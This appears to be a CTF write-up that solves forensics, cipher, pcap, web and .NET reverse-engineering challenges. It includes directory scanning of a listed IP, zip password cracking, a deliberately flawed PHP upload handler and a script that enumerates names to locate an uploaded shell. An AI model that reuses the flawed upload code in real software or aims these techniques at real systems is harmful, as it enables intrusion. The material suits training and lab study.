IEEE Olympics CTF Challenges Writeup

Hello friends, this is my writeup for the IEEE CTF Misc, RE, Forensics and Web challenges.

Forensics

easy

You can download the challenge from here EASY.

binwalk EASY.dd

binwalk --dd='.*' EASY.dd

Now we need to check all of the extracted files with exiftool.

Comment : VRRR{Gu!f_vf_Gur_sy@t_T00q-W0o}

Flag: IEEE{THSISTHEFLGGDJB}

Misc Challenges

1.Caesar salad

From the challenge name I thought that this was a Caesar cipher, but it was a Rail Fence cipher. I tried all the ciphers on this website until I got the flag.

Flag: IEEE{CaesarAintH4rd}

2.Uns3cure

We got a pcap file and I opened it with Wireshark, and it's so easy to find the plaintext password. You can download the file from here.

In this packet we can see someone telling someone else to log in with SSH to do something.

In this packet we found a plaintext string with the same name as the challenge, and we can confirm that this is the right password from the next packet.

Flag: IEEE{so_Uns3cure}

3.warm up

We have a base64-encoded string, and when we decode it we get an MD5 hash, but we need to fix the hash as mentioned in the description of the challenge.

False md5 hash: 482c811dha5d5b4bc6d497ffa98491ze38

Correct md5 hash: 482c811da5d5b4bc6d497ffa98491e38

Flag: IEEE{password123}

4.Brute Me

I just cracked the password and got the flag.

fcrackzip -u -v -D -p /usr/share/wordlists/rockyou.txt flag.zip

Flag: IEEE{Easy_Brute}

Web Challenges

1. S3ssion master

In this challenge we will play with the session cookie to get admin privileges and read the flag.

I played with the session but I couldn't figure out what it was or how we could get the admin cookie until I saw the hint for this challenge.

gobuster dir -u http://207.154.231.228:3000/ -w /usr/share/dirb/wordlists/common.txt -s 200,301


╭─xdev05@nic3One ~/Downloads/IEEE/writeup  
╰─➤  gobuster dir -u http://207.154.231.228:3000/ -w /usr/share/dirb/wordlists/common.txt -s 200,301
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://207.154.231.228:3000/
[+] Threads:        10
[+] Wordlist:       /usr/share/dirb/wordlists/common.txt
[+] Status codes:   200,301,302
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/09/28 09:07:37 Starting gobuster
===============================================================
/sess (Status: 301)
===============================================================
2020/09/28 09:08:05 Finished
===============================================================

After opening this dir I noticed that the characters of every dir name, and the name of the file in the last dir, make up a cookie. Let's see.

So the other dir will be the session for the admin. Let's see.

If we combine the dir names and the name of the file in the last one, we obtain the admin session.

admin session: ry t2 w3 nd 2n xx on rd bq d7 qh 1o k71bzpev8zpa7vgnn24db4m4imvrhzo1zatw10iv

Flag: IEEE{wh0 473 my c00k13?}

2.S3cure uploader


<?php
if(isset($_GET["upload"])) {
$target_dir = "uploads/";
$vars = explode(".", $_FILES["FileToUpload"]["name"]);
$filename=$vars[0];
$ext = $vars[1];
//randomizing file name
$time = date('Y-m-d H:i:s');
$new_name = md5(rand(1,1000).$time.$filename."0x4148fo").".".strtolower(pathinfo(basename($_FILES["FileToUpload"]["name"]),PATHINFO_EXTENSION));
$filename=explode(".", $_FILES["FileToUpload"]["name"])[0];
$ext = $filename=explode(".", $_FILES["FileToUpload"]["name"])[1];
$target_file = $target_dir . "$new_name";
// Check if file already exists
if (file_exists($target_file)) {
  echo "File already exists.";
  $uploadOk = 0;
  die();
}
// Check file size
if ($_FILES["FileToUpload"]["size"] > 500000) {
  echo "File is too large.";
  $uploadOk = 0;
  die();
}
$uploadOk = 1;
$check = getimagesize($_FILES["FileToUpload"]["tmp_name"]);
if($check !== false) {
    $uploadOk = 1;
} else {
    echo "File is not an image.";
    $uploadOk = 0;
    die();
  }
}
move_uploaded_file($_FILES["FileToUpload"]["tmp_name"], $target_file);
if(strtolower(pathinfo(basename($_FILES["FileToUpload"]["name"]),PATHINFO_EXTENSION))=="jpg"){
echo "File uploaded successfully to $target_file";
}
else{
	die("Invalid file type");
}
?>


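#!/usr/bin/env python3
import hashlib

# Values the uploader mixes into the file name: upload time,
# file name without extension, and the static key from the PHP source
date = "2020-09-27 21:25:01"
filename = "shell"
key = "0x4148fo"
print(key)
with open("final.txt", 'w') as f:
	# rand(1,1000) is the only unknown part, so write out every possible hash
	for i in range(1,1001):
		string = (str(i)+date+filename+key).encode('utf-8')
		digest = hashlib.md5(string).hexdigest()
		print(digest, file=f)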
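
The naming scheme in the PHP source above has a single unknown per upload second, rand(1,1000), which is why the script only needs 1000 hashes. The following is an added example, not part of the challenge or of the original write-up: it mirrors that scheme to count the possible names and contrasts it with a name drawn from a CSPRNG after an extension allowlist check. `safe_name`, `ALLOWED_EXT` and the sample file names are assumptions made for illustration.

```python
import hashlib
import secrets

SALT = "0x4148fo"        # static string from the challenge source
ALLOWED_EXT = {"jpg"}    # assumption: the only type the uploader means to accept


def weak_name(n, timestamp, client_name):
    """Mirror of the challenge scheme: md5(rand . time . stem . salt) + '.' + ext."""
    stem = client_name.split(".")[0]              # PHP: explode(".", name)[0]
    ext = client_name.rsplit(".", 1)[-1].lower()  # PHP: pathinfo(..., PATHINFO_EXTENSION)
    digest = hashlib.md5(f"{n}{timestamp}{stem}{SALT}".encode()).hexdigest()
    return f"{digest}.{ext}"


def candidate_names(timestamp, client_name):
    """Every name the scheme can produce in one second; only rand(1,1000) varies."""
    return {weak_name(n, timestamp, client_name) for n in range(1, 1001)}


def safe_name(client_name):
    """Hardened naming: check the extension first, then use a token unrelated to any input."""
    ext = client_name.rsplit(".", 1)[-1].lower() if "." in client_name else ""
    if ext not in ALLOWED_EXT:
        raise ValueError(f"extension {ext!r} not allowed")
    # 128 bits from the OS CSPRNG: nothing the client sends or observes narrows it down
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    ts = "2020-09-27 21:25:01"   # timestamp used in the script above
    print(len(candidate_names(ts, "photo.jpg")), "possible names with the weak scheme")
    print(safe_name("photo.jpg"), "(one of 2**128 with the hardened scheme)")
```

The hardened version also rejects the file before anything is written, whereas the PHP source calls move_uploaded_file before it checks the extension.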


Reverse Challenges

1.Dot Free

You can download the program from here rev.exe

So let’s use dnSpy to decompile it and see the code.

Flag: IEEE{Free_Points_4_u}

2.Trivia fun

You can download the program from here trivia.exe

The first one is asking for a username and password.

It’s .NET, so let’s use dnSpy to get them.

Remove the anti-debugging code: right-click, edit the class, delete the anti-debugging code, then compile and save.

First step:

Now we can solve the first step, which is the username and password. The code responsible for validating them is in Trivia_Form.

Username = AAAAA-AAAAA-AAAAA-AAAAA-AAAAA, which matches the regex.

Password: zzzzzzzzzzzzzzzd, whose ASCII values sum to 1930.

Second step:

To solve the second step, note that the code responsible for validating the answer is in Qs_l1.

Let’s write a script to bruteforce the answer:


import string

enc = "Gu4g_J0hyq_o3_Mn_Z4GpU"
alpha = string.ascii_letters
ans = ""
i = 0
while i < 22:
    if (ord(enc[i]) >= 97 and ord(enc[i]) <= 122) or (ord(enc[i]) >= 65 and ord(enc[i]) <= 90):
        # Letter: try every candidate c and keep the one whose 13-place shift gives enc[i]
        for c in alpha:
            if ord(c) >= 97 and ord(c) <= 122:
                if ord(c) > 109:
                    if chr(ord(c) - 13) == enc[i]:
                        ans += c
                        break
                else:
                    if chr(ord(c) + 13) == enc[i]:
                        ans += c
                        break
            elif ord(c) >= 65 and ord(c) <= 90:
                if ord(c) > 77:
                    if chr(ord(c) - 13) == enc[i]:
                        ans += c
                        break
                else:
                    if chr(ord(c) + 13) == enc[i]:
                        ans += c
                        break
    else:
        # Digits and underscores are left unchanged
        ans += enc[i]
    i += 1
print(ans)

The answer is: Th4t_W0uld_b3_Za_M4TcH

Third step:

The code responsible for validating the answer for this step is located in Qs_l2.

Let’s break it down to understand it better.

It just makes sure that the answer length is divisible by 3 and then divides it into 3 different arrays after converting them to their ASCII equivalent.

It creates the XOR keys by shifting with different values.

It XORs the answer with the keys and adds some values afterwards, then concatenates all of them and compares the result with: X5Q;DU~<{6p`87)[`ad1.

Let’s write a script to get the answer:


using System;
using System.Linq;

class Trivia
{
    // Convert a char array to an int array of character codes.
    int[] convert_carr_iarr(char[] carr)
    {
        int[] array = new int[carr.Length];
        for (int i = 0; i < carr.Length; i++)
        {
            array[i] = (int)carr[i];
        }
        return array;
    }

    // Convert an int array of character codes back to a char array.
    char[] convert_iarr_carr(int[] carr)
    {
        char[] array = new char[carr.Length];
        for (int i = 0; i < carr.Length; i++)
        {
            array[i] = (char)carr[i];
        }
        return array;
    }

    public string get_answer(string answer)
    {
        while (answer.Length % 3 != 0)
        {
            answer += "=";
        }
        // Split the input into three equal parts.
        int[] array = this.convert_carr_iarr(answer.Substring(0, answer.Length / 3).ToCharArray());
        int[] array2 = this.convert_carr_iarr(answer.Substring(answer.Length / 3, answer.Length / 3).ToCharArray());
        int[] array3 = this.convert_carr_iarr(answer.Substring(2 * answer.Length / 3, answer.Length / 3).ToCharArray());
        // Build the three XOR keys by shifting each key character.
        int[] array4 = new int["Z09CWQl".Length];
        int[] array5 = new int["Z09CWQl".Length];
        int[] array6 = new int["Z09CWQl".Length];
        for (int i = 0; i < "Z09CWQl".Length; i++)
        {
            int num = (int)"Z09CWQl"[i];
            array4[i] = num >> 3;
            array5[i] = num >> 4;
            array6[i] = num >> 2;
        }
        // Reverse the check: subtract the added value first, then XOR with the key.
        for (int j = 0; j < array.Length; j++)
        {
            array[j] ^= array4[j];
        }
        for (int k = 0; k < array2.Length; k++)
        {
            array2[k] = ((array2[k] - 6) ^ array5[k]);
        }
        for (int l = 0; l < array3.Length; l++)
        {
            array3[l] = ((array3[l] - 8) ^ array6[l]);
        }
        return string.Join<char>("", this.convert_iarr_carr(array).ToList<char>().Concat(this.convert_iarr_carr(array2).ToList<char>()).Concat(this.convert_iarr_carr(array3).ToList<char>()));
    }

    public static void Main()
    {
        string enc_answer = "X5Q;DU~<{6p`87)[`ad1.";
        Trivia h = new Trivia();
        string ans = h.get_answer(enc_answer);
        Console.WriteLine(ans);
    }
}

The answer is: S3V3N_s3v3n_777_VII==
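
The check described above and its inverse side by side, as an added example that is not part of the original write-up or of the decompiled program. The forward direction (`encode`) is reconstructed from the description and from the script above, so its exact order of operations is an assumption; the names `STAGES`, `encode` and `decode` are chosen here.

```python
KEY = "Z09CWQl"                    # key string from the script above
TARGET = "X5Q;DU~<{6p`87)[`ad1."   # value the transformed answer is compared with
# Per third: (right shift applied to each key char, constant added after the XOR)
STAGES = [(3, 0), (4, 6), (2, 8)]


def _thirds(text):
    n = len(text) // 3
    if len(text) % 3 or n > len(KEY):
        raise ValueError("length must be a multiple of 3 and at most 3 * len(KEY)")
    return [text[i * n:(i + 1) * n] for i in range(3)]


def encode(answer):
    """Forward check (assumed order): pad with '=', XOR with shifted key, then add."""
    answer += "=" * (-len(answer) % 3)
    out = []
    for part, (shift, add) in zip(_thirds(answer), STAGES):
        out += [chr((ord(c) ^ (ord(k) >> shift)) + add) for c, k in zip(part, KEY)]
    return "".join(out)


def decode(encoded):
    """Inverse: subtract the constant first, then XOR with the same shifted key."""
    out = []
    for part, (shift, add) in zip(_thirds(encoded), STAGES):
        out += [chr((ord(c) - add) ^ (ord(k) >> shift)) for c, k in zip(part, KEY)]
    return "".join(out)


if __name__ == "__main__":
    print(decode(TARGET))
    print(encode("S3V3N_s3v3n_777_VII") == TARGET)
```

Because the addition is applied after the XOR, the inverse has to subtract before it XORs; swapping the two gives different characters for the second and third parts.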

After solving all the questions it says to look at the code, so let’s check the code.

So it decrypts ‘whoami’, so let’s create a breakpoint and check what it returns.

Just set a breakpoint before the return to get the result value.

Flag: Flag{To_P4tch_0r_Not_To_P4tch}